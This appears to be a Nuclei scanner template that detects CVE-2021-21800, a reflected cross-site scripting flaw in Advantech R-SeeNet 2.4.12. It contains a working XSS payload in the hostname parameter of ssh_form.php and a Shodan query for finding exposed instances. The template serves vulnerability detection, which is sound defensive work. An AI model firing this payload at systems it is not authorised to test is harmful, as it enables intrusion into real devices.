50 lines
1.6 KiB
YAML
50 lines
1.6 KiB
YAML
id: CVE-2021-21800
|
|
|
|
info:
|
|
name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the ssh_form.php script functionality.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by Advantech to fix the XSS vulnerability in R-SeeNet 2.4.12.
|
|
reference:
|
|
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1271
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-21800
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-21800
|
|
cwe-id: CWE-79
|
|
epss-score: 0.83144
|
|
epss-percentile: 0.98118
|
|
cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: advantech
|
|
product: r-seenet
|
|
shodan-query: http.html:"R-SeeNet"
|
|
tags: cve,cve2021,xss,r-seenet
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<title>SSH Session </title><script>alert(document.domain)</script><title></title>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022064fca5336b02f6e5e8ac3662f7b55c24c0cdcf47371e7c15a73724c30e0492ad022040b7887558ec5b12a9d57f230b98bb4eb86e10023b6a391c13f20f51b0db6f3c:922c64590222798bb761d5b6d8e72950 |